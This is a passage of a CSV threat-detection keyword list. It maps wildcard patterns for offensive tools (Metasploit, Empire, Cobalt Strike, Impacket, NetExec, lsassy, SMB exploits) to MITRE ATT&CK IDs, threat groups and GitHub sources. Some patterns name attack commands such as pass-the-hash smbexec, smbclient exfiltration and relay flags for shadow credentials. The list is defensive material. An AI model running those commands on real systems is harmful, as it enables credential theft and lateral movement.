utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*SluiEOP.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*smartbrute *kerberos*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*SmashedPotato.cs*,offensive_tool_keyword,SmashedPotato,A modification of @breenmachine original Hot Potato Priv Esc Exploit,T1059 - T1134 - T1201 - T1518,TA0002 - TA0004 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Cn33liz/SmashedPotato,1,1,N/A,N/A,1,81,35,2016-01-29T14:31:18Z,2016-01-20T20:49:08Z -*SmashedPotato.exe*,offensive_tool_keyword,SmashedPotato,A modification of @breenmachine original Hot Potato Priv Esc Exploit,T1059 - T1134 - T1201 - T1518,TA0002 - TA0004 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Cn33liz/SmashedPotato,1,1,N/A,N/A,1,81,35,2016-01-29T14:31:18Z,2016-01-20T20:49:08Z -*smb * -u * -p * * -M bh_owned*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*smb * -u * -p * -M ioxidresolver*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*smb.dcsync*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*smb/impacket*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb/relay/ntlm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_doublepulsar_rce.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_doublepulsar_rce.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_enumshares*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_enumshares.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_enumusers*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_enumusers.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_enumusers_domain.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_eternalblue*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*smb_ms17_010_pass*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_pipename_stager*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*smb_rras_erraticgopher.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_shadow.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_shadow.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_stealth.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*smb_win.py*,offensive_tool_keyword,SMBGhost_RCE_PoC,RCE PoC for CVE-2020-0796 SMBGhost,T1210 - T1059 - T1505 - T1021 - T1027,TA0001 - TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/chompie1337/SMBGhost_RCE_PoC,1,1,N/A,N/A,10,1264,355,2020-07-02T18:51:47Z,2020-06-02T00:14:47Z -*smb1_anonymous_connect_ipc*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*smb1_anonymous_login*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*-smb2support --remove-mic --shadow-credentials --shadow-target *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smbattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*smbattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*smbclient \\\\\\\\*\\\\TRANSFER -N -p * -c \*put *,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*smbcrawler*,offensive_tool_keyword,smbcrawler,SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares,T1077 - T1021 - T1110 - T1083,TA0002 - TA0008 - TA0009,N/A,N/A,Lateral Movement - Collection,https://github.com/SySS-Research/smbcrawler,1,1,N/A,N/A,2,129,13,2023-05-14T06:48:40Z,2021-06-09T19:27:08Z -*SMBeagle.exe*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*SMBeagle.sln*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*smbeagle_*_linux_amd64.zip*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*smbeagle_*_linux_arm64.zip*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*smbeagle_*_win_x64.zip*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*smbenum.run*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*SMBetray*,offensive_tool_keyword,SMBetray,PoC to demonstrate the ability of an attacker to intercept and modify insecure SMB connections. as well as compromise some secured SMB connections if credentials are known.,T1557 - T1562 - T1553 - T1213,TA0002 - TA0008 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/quickbreach/SMBetray,1,1,N/A,N/A,4,382,97,2018-08-17T00:45:05Z,2018-08-12T00:38:02Z -*-SMBExec*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-SMBExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*smbexec.py -hashes :*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smbexec.py -share*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - 